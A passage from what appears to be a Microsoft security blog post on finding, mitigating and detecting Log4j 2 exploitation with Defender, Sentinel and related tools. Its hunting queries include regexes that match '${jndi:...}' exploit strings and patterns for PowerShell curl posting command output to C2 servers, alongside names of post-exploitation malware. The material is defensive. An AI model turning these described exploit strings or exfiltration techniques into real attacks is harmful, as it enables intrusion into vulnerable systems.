vulnerabilities ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) or [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>)). The threat and vulnerability management capabilities within Microsoft 365 Defender can help identify vulnerable installations. On December 15, we began rolling out updates to provide a consolidated view of the organizational exposure to the Log4j 2 vulnerabilities\u2014on the device, software, and vulnerable component level\u2014through a range of automated, complementing capabilities. These capabilities are supported on Windows 10, Windows 11, and Windows Server 2008, 2012, and 2016. They are also supported on Linux, but they require updating the Microsoft Defender for Endpoint Linux client to version 101.52.57 (30.121092.15257.0) or later. The updates include the following:\n\n * Discovery of vulnerable Log4j library components (paths) on devices\n * Discovery of vulnerable installed applications that contain the Log4j library on devices\n * A [dedicated Log4j dashboard](<https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2021-44228/overview>) that provides a consolidated view of various findings across vulnerable devices, vulnerable software, and vulnerable files\n * Introduction of a new schema in advanced hunting, **DeviceTvmSoftwareEvidenceBeta**, which surfaces file-level findings from the disk and provides the ability to correlate them with additional context in advanced hunting:\n \n \n DeviceTvmSoftwareEvidenceBeta\n | mv-expand DiskPaths\n | where DiskPaths contains \"log4j\"\n | project DeviceId, SoftwareName, SoftwareVendor, SoftwareVersion, DiskPaths\n\nTo complement this new table, the existing **DeviceTvmSoftwareVulnerabilities** table in advanced hunting can be used to identify vulnerabilities in installed software on devices:\n \n \n DeviceTvmSoftwareVulnerabilities \n | where CveId in (\"CVE-2021-44228\", \"CVE-2021-45046\")\n\nThese new capabilities integrate with the existing threat and vulnerability management experience and are gradually rolling out. As of December 27, 2021, discovery is based on installed application CPEs that are known to be vulnerable to Log4j RCE, as well as the presence of vulnerable Log4j Java Archive (JAR) files. Cases where Log4j is packaged into an Uber-JAR or shaded are currently not discoverable, but support for discovery of these instances and other packaging methods is in development. Support for macOS is also in progress and will roll out soon.\n\n\n\n_Figure 1. Threat and Vulnerability recommendation __\u201cAttention required: Devices found with vulnerable Apache Log4j versions\u201d_\n\nOn the Microsoft 365 Defender portal, go to **Vulnerability management** &gt; **Dashboard** &gt; **Threat awareness**, then click **View vulnerability details** to see the consolidated view of organizational exposure to the Log4j 2 vulnerability (for example, CVE-2021-44228 dashboard, as shown in the following screenshots) on the device, software, and vulnerable component level.\n\n\n\n_Figure 2. Threat and vulnerability management dedicated CVE-2021-44228 dashboard_\n\n\n\n_Figure 3. Threat and vulnerability management finds exposed paths_\n\n\n\n_Figure 4. Threat and vulnerability management finds exposed devices based on vulnerable software and vulnerable files detected on disk_\n\nNote: Scan results may take some time to reach full coverage, and the number of discovered devices may be low at first but will grow as the scan reaches more devices. A regularly updated list of vulnerable products can be viewed in the Microsoft 365 Defender portal with matching recommendations. We will continue to review and update this list as new information becomes available.\n\nThrough [device discovery](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/unmanaged-device-protection-capabilities-are-now-generally/ba-p/2463796>), unmanaged devices with products and services affected by the vulnerabilities are also surfaced so they can be onboarded and secured.\n\n\n\n_Figure 5. Finding vulnerable applications and devices via software inventory_\n\n#### Applying mitigation directly in the Microsoft 365 Defender portal\n\nWe have released two new threat and vulnerability management capabilities that can significantly simplify the process of turning off JNDI lookup, a workaround that can prevent the exploitation of the Log4j vulnerabilities on most devices, using an environment variable called LOG4J_FORMAT_MSG_NO_LOOKUPS. These new capabilities provide security teams with the following:\n\n 1. View the mitigation status for each affected device. This can help prioritize mitigation and/or patching of devices based on their mitigation status.\n\nTo use this feature, open the [Exposed devices tab](<https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2021-44228/exposedDevices>) in the dedicated CVE-2021-44228 dashboard and review the **Mitigation status** column. Note that it may take a few hours for the updated mitigation status of a device to be reflected.\n\n\n\n_Figure 6. Viewing each device\u2019s mitigation status_\n\n 2. Apply the mitigation (that is, turn off JNDI lookup) on devices directly from the portal. This feature is currently available for Windows devices only.\n\nThe mitigation will be applied directly via the Microsoft Defender for Endpoint client. To view the mitigation options, click on the **Mitigation options** button in the [Log4j dashboard](<https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2021-44228/overview>):\n\n\n\nYou can choose to apply the mitigation to all exposed devices or select specific devices for which you would like to apply it. To complete the process and apply the mitigation on devices, click **Create mitigation action**.\n\n\n\n_Figure 7. Creating mitigation actions for exposed devices._\n\nIn cases where the mitigation needs to be reverted, follow these steps:\n\n 1. Open an elevated PowerShell window\n 2. Run the following command:\n \n \n [Environment]::SetEnvironmentVariable(\"LOG4J_FORMAT_MSG_NO_LOOKUPS\", $null, [EnvironmentVariableTarget]::Machine)\n\nThe change will take effect after the device restarts.\n\n### Microsoft 365 Defender advanced hunting\n\nAdvance hunting can also surface affected software. This query looks for possibly vulnerable applications using the affected Log4j component. Triage the results to determine applications and programs that may need to be patched and updated.\n \n \n DeviceTvmSoftwareInventory\n | where SoftwareName contains \"log4j\"\n | project DeviceName, SoftwareName, SoftwareVersion\n\n\n\n_Figure 8. Finding vulnerable software via advanced hunting_\n\n### Microsoft Defender for Cloud\n\n#### Microsoft Defender for servers\n\nOrganizations using Microsoft Defender for Cloud can use [Inventory tools](<https://docs.microsoft.com/azure/defender-for-cloud/asset-inventory>) to begin investigations before there\u2019s a CVE number. With Inventory tools, there are two ways to determine exposure across hybrid and multi-cloud resources:\n\n * Vulnerability assessment findings \u2013 Organizations who have enabled any of the vulnerability assessment tools (whether it&#x27;s Microsoft Defender for Endpoint&#x27;s [threat and vulnerability management](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-tvm>) module, the [built-in Qualys scanner](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-vm>), or a [bring your own license solution](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-byol-vm>)), they can search by CVE identifier:\n\n\n\n_Figure 9. Searching vulnerability assessment findings by CVE identifier_\n\n * Software inventory - With the combined [integration with Microsoft Defender for Endpoint](<https://docs.microsoft.com/azure/defender-for-cloud/integration-defender-for-endpoint>) and [Microsoft Defender for servers](<https://docs.microsoft.com/azure/defender-for-cloud/defender-for-servers-introduction>), organizations can search for resources by installed applications and discover resources running the vulnerable software:\n\n\n\n_Figure 10. Searching software inventory by installed applications_\n\nNote that this doesn\u2019t replace a search of your codebase. It\u2019s possible that software with integrated Log4j libraries won\u2019t appear in this list, but this is helpful in the initial triage of investigations related to this incident. For more information about how Microsoft Defender for Cloud finds machines affected by CVE-2021-44228, read this [tech community post](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-cloud/how-defender-for-cloud-finds-machines-affected-by-log4j/ba-p/3037271>).\n\n#### Microsoft Defender for Containers\n\nMicrosoft Defender for Containers is capable of discovering images affected by the vulnerabilities recently discovered in Log4j 2: [CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>), [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>), and [CVE-2021-45105](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>). Images are automatically scanned for vulnerabilities in three different use cases: when pushed to an Azure container registry, when pulled from an Azure container registry, and when container images are running on a Kubernetes cluster. Additional information on supported scan triggers and Kubernetes clusters can be found [here](<https://docs.microsoft.com/azure/defender-for-cloud/defender-for-containers-introduction?tabs=defender-for-container-arch-aks>). \n\nLog4j binaries are discovered whether they are deployed via a package manager, copied to the image as stand-alone binaries, or included within a JAR Archive (up to one level of nesting). \n\nWe will continue to follow up on any additional developments and will update our detection capabilities if any additional vulnerabilities are reported.\n\n**Finding affected images**\n\nTo find vulnerable images across registries using the Azure portal, navigate to the **Microsoft Defender for Cloud** service under Azure Portal. Open the **Container Registry images should have vulnerability findings resolved** recommendation and search findings for the relevant CVEs. \n\n\n\n_Figure 11. Finding images with the CVE-2021-45046 vulnerability_ \n\n**Find vulnerable running images on Azure portal [preview] **\n\nTo view only vulnerable images that are currently running on a Kubernetes cluster using the Azure portal, navigate to the **Microsoft Defender for Cloud** service under Azure Portal. Open the **Vulnerabilities in running container images should be remediated (powered by Qualys)** recommendation and search findings for the relevant CVEs: \n\n\n\n_Figure 12. Finding running images with the CVE-2021-45046 vulnerability _\n\nNote: This recommendation requires clusters to run Microsoft Defender security profile to provide visibility on running images.\n\n**Search Azure Resource Graph data ******\n\nAzure Resource Graph (ARG) provides instant access to resource information across cloud environments with robust filtering, grouping, and sorting capabilities. It&#x27;s a quick and efficient way to query information across Azure subscriptions programmatically or from within the Azure portal. ARG provides another way to query resource data for resources found to be affected by the Log4j vulnerability.\n\nThe following query finds resources affected by the Log4j vulnerability across subscriptions. Use the additional data field across all returned results to obtain details on vulnerable resources: \n \n \n securityresources \n | where type =~ \"microsoft.security/assessments/subassessments\"\n | extend assessmentKey=extract(@\"(?i)providers/Microsoft.Security/assessments/([^/]*)\", 1, id), subAssessmentId=tostring(properties.id), parentResourceId= extract(\"(.+)/providers/Microsoft.Security\", 1, id)\n | extend Props = parse_json(properties)\n | extend additionalData = Props.additionalData\n | extend cves = additionalData.cve\n | where isnotempty(cves) and array_length(cves) > 0\n | mv-expand cves\n | where tostring(cves) has \"CVE-2021-44228\" or tostring(cves) has \"CVE-2021-45046\" or tostring(cves) has \"CVE-2021-45105\" \n\n### Microsoft Sentinel queries\n\nMicrosoft Sentinel customers can use the following detection query to look for devices that have applications with the vulnerability:\n\n * [Vulnerable machines related to Log4j CVE-2021-44228](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityNestedRecommendation/Log4jVulnerableMachines.yaml>)\n\nThis query uses the Microsoft Defender for Cloud nested recommendations data to find machines vulnerable to Log4j CVE-2021-44228.\n\nMicrosoft Sentinel also provides a CVE-2021-44228 Log4Shell Research Lab Environment for testing the vulnerability: <https://github.com/OTRF/Microsoft-Sentinel2Go/tree/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell>\n\n### RiskIQ EASM and Threat Intelligence\n\nRiskIQ has published a few threat intelligence articles on this CVE, with mitigation guidance and IOCs. The latest one with links to previous articles can be found [here](<https://community.riskiq.com/article/67ba1386>). Both Community users and enterprise customers can search within the threat intelligence portal for data about potentially vulnerable components exposed to the Internet. For example, it&#x27;s possible to [surface all observed instances of Apache](<https://community.riskiq.com/search/components?category=Server&query=Apache>) or [Java](<https://community.riskiq.com/research?query=java>), including specific versions. Leverage this method of exploration to aid in understanding the larger Internet exposure, while also filtering down to what may impact you. \n\nFor a more automated method, registered users can view their attack surface to understand tailored findings associated with their organization. Note, you must be registered with a corporate email and the automated attack surface will be limited. Digital Footprint customers can immediately understand what may be vulnerable and act swiftly and resolutely using the [Attack Surface Intelligence Dashboard](<https://app.riskiq.net/a/main/index#/dashboards/379/RiskIQ%20Attack%20Intelligence%20Dashboard>) Log4J Insights tab. \n\n## Detecting and responding to exploitation attempts and other related attacker activity\n\n### Microsoft 365 Defender\n\nMicrosoft 365 Defender coordinates multiple security solutions that detect components of observed attacks taking advantage of this vulnerability, from exploitation attempts to remote code execution and post-exploitation activity.\n\n\n\n_Figure 13. Microsoft 365 Defender solutions protect against related threats_\n\nCustomers can click **Need help?** in the Microsoft 365 Defender portal to open up a search widget. Customers can key in \u201cLog4j\u201d to search for in-portal resource, check if their network is affected, and work on corresponding actionable items to mitigate them.\n\n#### Microsoft Defender Antivirus\n\nTurn on cloud-delivered protection in Microsoft Defender Antivirus to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block the majority of new and unknown variants. Microsoft Defender Antivirus detects components and behaviors related to this threat as the following detection names:\n\nOn Windows:\n\n * [Trojan:Win32/Capfetox.AA](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Capfetox.AA&threatId=-2147159827>)- detects attempted exploitation on the attacker machine\n * [HackTool:Win32/Capfetox.A!dha](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=HackTool:Win32/Capfetox.A!dha&threatId=-2147159807>) - detects attempted exploitation on the attacker machine\n * [VirTool:Win64/CobaltSrike.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=VirTool:Win64/CobaltStrike.A&threatId=-2147200161>), [TrojanDropper:PowerShell/Cobacis.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDropper:PowerShell/Cobacis.A&threatId=-2147200375>) - detects Cobalt Strike Beacon loaders\n * [TrojanDownloader:Win32/CoinMiner](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Win32/CoinMiner&threatId=-2147257370>) - detects post-exploitation coin miner\n * [Trojan:Win32/WebToos.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/WebToos.A&threatId=-2147278986>) - detects post-exploitation PowerShell\n * [Ransom:MSIL/Khonsari.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:MSIL/Khonsari.A&threatId=-2147159485>) - detects a strain of the Khonsari ransomware family observed being distributed post-exploitation\n * [Trojan:Win64/DisguisedXMRigMiner](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win64/DisguisedXMRigMiner&threatId=-2147169351>) - detects post-exploitation cryptocurrency miner\n * [TrojanDownloader:Java/Agent.S](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Java/Agent.S&threatId=-2147159796>) - detects suspicious class files used in post-exploitation\n * [TrojanDownloader:PowerShell/NitSky.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:PowerShell/NitSky.A&threatId=-2147157401>) - detects attempts to download CobaltStrike Beacon payload\n\nOn Linux:\n\n * [Trojan:Linux/SuspectJavaExploit.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/SuspectJavaExploit.A&threatId=-2147159829>), [Trojan:Linux/SuspectJavaExploit.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/SuspectJavaExploit.B&threatId=-2147159828>), [Trojan:Linux/SuspectJavaExploit.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/SuspectJavaExploit.C&threatId=-2147159808>) - blocks Java processes downloading and executing payload through output redirection\n * [Trojan:Linux/BashMiner.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/BashMiner.A&threatId=-2147159832>) - detects post-exploitation cryptocurrency miner\n * [TrojanDownloader:Linux/CoinMiner](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/CoinMiner&threatId=-2147241315>) - detects post-exploitation cryptocurrency miner\n * [TrojanDownloader:Linux/Tusnami](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/Tusnami.A&threatId=-2147159794>) - detects post-exploitation Backdoor Tsunami downloader\n * [Backdoor:Linux/Tusnami.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Linux/Tusnami.C!MTB&threatId=-2147178887>) - detects post-exploitation Tsunami backdoor\n * [Backdoor:Linux/Setag.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Linux/Setag.C&threatId=-2147277056>) - detects post-exploitation Gates backdoor\n * [Exploit:Linux/CVE-2021-44228.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Linux/CVE-2021-44228.A&threatId=-2147159804>), [Exploit:Linux/CVE-2021-44228.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Linux/CVE-2021-44228.B&threatId=-2147159803>) - detects exploitation\n * [TrojanDownloader:Linux/Capfetox.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/Capfetox.A&threatId=-2147159639>), [TrojanDownloader:Linux/Capfetox.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/Capfetox.B&threatId=-2147159640>)\n * [TrojanDownloader:Linux/ShAgnt!MSR](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/ShAgnt!MSR&threatId=-2147159432>), [TrojanDownloader:Linux/ShAgnt.A!MTB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/ShAgnt.A!MTB&threatId=-2147159607>)\n * [Trojan:Linux/Kinsing.L](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/Kinsing.L&threatId=-2147189973>) - detects post-exploitation cryptocurrency Kinsing miner\n * [Trojan:Linux/Mirai.TS!MTB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/Mirai.TS!MTB&threatId=-2147159629>) - detects post-exploitation Mirai malware capable of performing DDoS\n * [Backdoor:Linux/Dakkatoni.az!MTB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Linux/Dakkatoni.az!MTB&threatId=-2147205141>) - detects post-exploitation Dakkatoni backdoor trojan capable of downloading more payloads\n * [Trojan:Linux/JavaExploitRevShell.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/JavaExploitRevShell.A&threatId=-2147159631>) - detects reverse shell attack post-exploitation\n * [Trojan:Linux/BashMiner.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/BashMiner.A&threatId=-2147159832>), [Trojan:Linux/BashMiner.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/BashMiner.B&threatId=-2147159820>) - detects post-exploitation cryptocurrency miner\n\n#### Microsoft Defender for Endpoint\n\nUsers of Microsoft Defender for Endpoint can turn on the following attack surface reduction rule to block or audit some observed activity associated with this threat.\n\n * Block executable files from running unless they meet a prevalence, age, or trusted list criterion\n\nDue to the broad network exploitation nature of vectors through which this vulnerability can be exploited and the fact that applying mitigations holistically across large environments will take time, we encourage defenders to look for signs of post-exploitation rather than fully relying on prevention. Observed post exploitation activity such as coin mining, lateral movement, and Cobalt Strike are detected with behavior-based detections.\n\nAlerts with the following titles in the Security Center indicate threat activity related to exploitation of the Log4j vulnerability on your network and should be immediately investigated and remediated. These alerts are supported on both Windows and Linux platforms: \n\n * **Log4j exploitation detected** \u2013 detects known behaviors that attackers perform following successful exploitation of the CVE-2021-44228 vulnerability\n * **Log4j exploitation artifacts detected** (previously titled Possible exploitation of CVE-2021-44228) \u2013 detects coin miners, shells, backdoor, and payloads such as Cobalt Strike used by attackers post-exploitation\n * **Log4j exploitation network artifacts detected** (previously titled Network connection seen in CVE-2021-44228 exploitation) - detects network traffic connecting traffic connecting to an address associated with CVE-2021-44228 scanning or exploitation activity \n\nThe following alerts may indicate exploitation attempts or testing/scanning activity. Microsoft advises customers to investigate with caution, as these alerts don\u2019t necessarily indicate successful exploitation:\n\n * **Possible target of Log4j exploitation - **detects a possible attempt to exploit the remote code execution vulnerability in the Log4j component of an Apache server in communication __received by__ this device\n * **Possible target of Log4j vulnerability scanning** \u2013 detects a possible __attempt to scan__ for the remote code execution vulnerability in a Log4j component of an Apache server in communication received by this device\n * **Possible source of Log4j exploitation** \u2013 detects a possible attempt to exploit the remote code execution vulnerability in the Log4j component of an Apache server in communication __initiated from__ this device \n * **Possible Log4j exploitation** - detects multiple behaviors, including suspicious command launch post-exploitation\n * **Possible Log4j exploitation (CVE-2021-44228)** \u2013 inactive, initially covered several of the above, now replaced with more specific titles\n\nThe following alerts detect activities that have been observed in attacks that utilize at least one of the Log4j vulnerabilities. However, these alerts can also indicate activity that is not related to the vulnerability. We are listing them here, as it is highly recommended that they are triaged and remediated immediately given their severity and the potential that they could be related to Log4j exploitation:\n\n * Suspicious remote PowerShell execution \n * Download of file associated with digital currency mining \n * Process associated with digital currency mining \n * Cobalt Strike command and control detected \n * Suspicious network traffic connection to C2 Server \n * Ongoing hands-on-keyboard attacker activity detected (Cobalt Strike) \n\nSome of the alerts mentioned above utilize the enhanced network inspection capabilities in Microsoft Defender for Endpoint. These alerts correlate several network and endpoint signals into high-confidence detection of successful exploitation, as well as providing detailed evidence artifacts valuable for triage and investigation of detected activities.\n\n\n\n_Figure 14. Example detection leveraging network inspection provides details about the Java class returned following successful exploitation_\n\n#### Microsoft Defender for Cloud Apps (previously Microsoft Cloud App Security)\n\nMicrosoft 365 Defender detects exploitation patterns in different data sources, including cloud application traffic reported by Microsoft Defender for Cloud Apps. The following alert surfaces exploitation attempts via cloud applications that use vulnerable Log4j components:\n\n * Log4j exploitation attempt via cloud application (previously titled Exploitation attempt against Log4j (CVE-2021-44228))\n\n\n\n_Figure 15. Microsoft 365 Defender alert &quot;Exploitation attempt against Log4j (CVE-2021-4428)&quot;_\n\n#### Microsoft Defender for Office 365\n\nTo add a layer of protection against exploits that may be delivered via email, Microsoft Defender for Office 365 flags suspicious emails (e.g., emails with the \u201cjndi\u201d string in email headers or the sender email address field), which are moved to the Junk folder.\n\nWe also added the following new alert, which detects attempts to exploit CVE-2021-44228 through email headers:\n\n * Log4j exploitation attempt via email (previously titled Log4j Exploitation Attempt \u2013 Email Headers (CVE-2021-44228))\n\n\n\n_Figure 16. __Sample alert on malicious sender display name found in email correspondence_\n\nThis detection looks for exploitation attempts in email headers, such as the sender display name, sender, and recipient addresses. The alert covers known obfuscation attempts that have been observed in the wild. If this alert is surfaced, customers are recommended to evaluate the source address, email subject, and file attachments to get more context regarding the authenticity of the email.\n\n\n\n_Figure 17. Sample email with malicious sender display name_\n\nIn addition, this email event as can be surfaced via advanced hunting:\n\n\n\n_Figure 18. Sample email event surfaced via advanced hunting _\n\n#### Microsoft 365 Defender advanced hunting queries\n\nTo locate possible exploitation activity, run the following queries:\n\n**Possible malicious indicators in cloud application events**\n\nThis query is designed to flag exploitation attempts for cases where the attacker is sending the crafted exploitation string using vectors such as User-Agent, Application or Account name. The hits returned from this query are most likely unsuccessful attempts, however the results can be useful to identity attackers\u2019 details such as IP address, Payload string, Download URL, etc. \n \n \n CloudAppEvents\n | where Timestamp > datetime(\"2021-12-09\")\n | where UserAgent contains \"jndi:\" \n or AccountDisplayName contains \"jndi:\"\n or Application contains \"jndi:\"\n or AdditionalFields contains \"jndi:\"\n | project ActionType, ActivityType, Application, AccountDisplayName, IPAddress, UserAgent, AdditionalFields\n\n**Alerts related to Log4j vulnerability**\n\nThis query looks for alert activity pertaining to the Log4j vulnerability.\n \n \n AlertInfo\n | where Title in~('Suspicious script launched',\n 'Exploitation attempt against Log4j (CVE-2021-44228)',\n 'Suspicious process executed by a network service',\n 'Possible target of Log4j exploitation (CVE-2021-44228)',\n 'Possible target of Log4j exploitation',\n 'Possible Log4j exploitation',\n 'Network connection seen in CVE-2021-44228 exploitation',\n 'Log4j exploitation detected',\n 'Possible exploitation of CVE-2021-44228',\n 'Possible target of Log4j vulnerability (CVE-2021-44228) scanning',\n 'Possible source of Log4j exploitation',\n 'Log4j exploitation attempt via cloud application', // Previously titled Exploitation attempt against Log4j\n 'Log4j exploitation attempt via email' // Previously titled Log4j Exploitation Attempt\n )\n\n**Devices with Log4j vulnerability alerts and additional other alert-related context**\n\nThis query surfaces devices with Log4j-related alerts and adds additional context from other alerts on the device. \n \n \n // Get any devices with Log4J related Alert Activity\n let DevicesLog4JAlerts = AlertInfo\n | where Title in~('Suspicious script launched',\n 'Exploitation attempt against Log4j (CVE-2021-44228)',\n 'Suspicious process executed by a network service',\n 'Possible target of Log4j exploitation (CVE-2021-44228)',\n 'Possible target of Log4j exploitation',\n 'Possible Log4j exploitation',\n 'Network connection seen in CVE-2021-44228 exploitation',\n 'Log4j exploitation detected',\n 'Possible exploitation of CVE-2021-44228',\n 'Possible target of Log4j vulnerability (CVE-2021-44228) scanning',\n 'Possible source of Log4j exploitation'\n 'Log4j exploitation attempt via cloud application', // Previously titled Exploitation attempt against Log4j\n 'Log4j exploitation attempt via email' // Previouskly titled Log4j Exploitation Attempt\n )\n // Join in evidence information\n | join AlertEvidence on AlertId\n | where DeviceId != \"\"\n | summarize by DeviceId, Title;\n // Get additional alert activity for each device\n AlertEvidence\n | where DeviceId in(DevicesLog4JAlerts)\n // Add additional info\n | join kind=leftouter AlertInfo on AlertId\n | summarize DeviceAlerts = make_set(Title), AlertIDs = make_set(AlertId) by DeviceId, bin(Timestamp, 1d)\n\n**Suspected exploitation of Log4j vulnerability**\n\nThis query looks for exploitation of the vulnerability using known parameters in the malicious string. It surfaces exploitation but may surface legitimate behavior in some environments.\n \n \n DeviceProcessEvents\n | where ProcessCommandLine has_all('${jndi') and ProcessCommandLine has_any('ldap', 'ldaps', 'http', 'rmi', 'dns', 'iiop')\n //Removing FPs \n | where not(ProcessCommandLine has_any('stackstorm', 'homebrew')) \n\n**Regex to identify malicious exploit string**\n\nThis query looks for the malicious string needed to exploit this vulnerability.\n \n \n DeviceProcessEvents\n | where ProcessCommandLine matches regex @'(?i)\\$\\{jndi:(ldap|http|https|ldaps|dns|rmi|iiop):\\/\\/(\\$\\{([a-z]){1,20}:([a-z]){1,20}\\})?(([a-zA-Z0-9]|-){2,100})?(\\.([a-zA-Z0-9]|-){2,100})?\\.([a-zA-Z0-9]|-){2,100}\\.([a-z0-9]){2,20}(\\/).*}' \n or InitiatingProcessCommandLine matches regex @'(?i)\\$\\{jndi:(ldap|http|https|ldaps|dns|rmi|iiop):\\/\\/(\\$\\{([a-z]){1,20}:([a-z]){1,20}\\})?(([a-zA-Z0-9]|-){2,100})?(\\.([a-zA-Z0-9]|-){2,100})?\\.([a-zA-Z0-9]|-){2,100}\\.([a-z0-9]){2,20}(\\/).*}'\n\n**Suspicious process event creation from VMWare Horizon TomcatService**\n\nThis query identifies anomalous child processes from the _ws_TomcatService.exe_ process associated with the exploitation of the Log4j vulnerability in VMWare Horizon installations. These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.\n \n \n DeviceProcessEvents\n | where InitiatingProcessFileName has \"ws_TomcatService.exe\"\n | where FileName != \"repadmin.exe\"\n\n**Suspicious JScript staging comment**\n\nThis query identifies a unique string present in malicious PowerShell commands attributed to threat actors exploiting vulnerable Log4j applications. These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.\n \n \n DeviceProcessEvents\n | where FileName has \"powershell.exe\"\n | where ProcessCommandLine has \"VMBlastSG\"\n \n\n**Suspicious PowerShell curl flags**\n\nThis query identifies unique, uncommon PowerShell flags used by curl to post the results of an attacker-executed command back to the command-and-control infrastructure. If the event is a true positive, the contents of the \u201cBody\u201d argument are Base64-encoded results from an attacker-issued comment. These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.\n \n \n DeviceProcessEvents\n | where FileName has \"powershell.exe\"\n | where ProcessCommandLine has_all(\"-met\", \"POST\", \"-Body\")\n\n### Microsoft Defender for Cloud\n\nMicrosoft Defender for Cloud\u2019s threat detection capabilities have been expanded to surface exploitation of CVE-2021-44228 in several relevant security alerts:\n\nOn Windows:\n\n * Detected obfuscated command line\n * Suspicious use of PowerShell detected\n\nOn Linux:\n\n * Suspicious file download\n * Possible Cryptocoinminer download detected\n * Process associated with digital currency mining detected\n * Potential crypto coin miner started\n * A history file has been cleared\n * Suspicious Shell Script Detected\n * Suspicious domain name reference\n * Digital currency mining related behavior detected\n * Behavior similar to common Linux bots detected\n\n### Microsoft Defender for IoT\n\nMicrosoft Defender for IoT has released a dedicated threat Intelligence update package for detecting Log4j 2 exploit attempts on the network (example below). \n\n\n\n_Figure 19. Microsoft Defender for IoT alert_ \n\nThe package is available for download from the [Microsoft Defender for IoT portal](<https://ms.portal.azure.com/#blade/Microsoft_Azure_IoT_Defender/IoTDefenderDashboard/Getting_Started>) (Click _Updates_, then _Download file _(MD5: 4fbc673742b9ca51a9721c682f404c41). \n\n\n\n_Figure 20. Microsoft Defender for IoT sensor threat intelligence update_\n\nMicrosoft Defender for IoT now pushes new threat intelligence packages to cloud-connected sensors upon release, [click here ](<https://docs.microsoft.com/en-us/azure/defender-for-iot/organizations/release-notes>)for more information. Starting with sensor version 10.3, users can automatically receive up-to-date threat intelligence packages through Microsoft Defender for IoT.\n\nWorking with automatic updates reduces operational effort and ensures greater security. Enable automatic updating on the [Defender for IoT portal](<https://ms.portal.azure.com/#blade/Microsoft_Azure_IoT_Defender/IoTDefenderDashboard/Sites>) by onboarding your cloud-connected sensor with the toggle for Automatic Threat Intelligence Updates turned on. For more information about threat intelligence packages in Defender for IoT, please refer to the [documentation](<https://docs.microsoft.com/en-us/azure/defender-for-iot/organizations/how-to-work-with-threat-intelligence-packages>).\n\n### Microsoft Sentinel\n\nA new Microsoft Sentinel solution has been added to the Content Hub that provides a central place to install Microsoft Sentinel specific content to monitor, detect, and investigate signals related to exploitation of the CVE-2021-44228 vulnerability.\n\n\n\n_Figure 21. Log4j Vulnerability Detection solution in Microsoft Sentinel_\n\nTo deploy this solution, in the Microsoft Sentinel portal, select **Content hub (Preview)** under **Content Management**, then search for **Log4j** in the search bar. Select the **Log4j vulnerability detection** solution, and click **Install**. Learn how to [centrally discover and deploy Microsoft Sentinel out-of-the-box content and solutions](<https://docs.microsoft.com/azure/sentinel/sentinel-solutions-deploy>).\n\n\n\n_Figure 22. Microsoft Sentinel Analytics showing detected Log4j vulnerability_\n\nNote: We recommend that you check the solution for updates periodically, as new collateral may be added to this solution given the rapidly evolving situation. This can be verified on the main Content hub page.\n\n#### 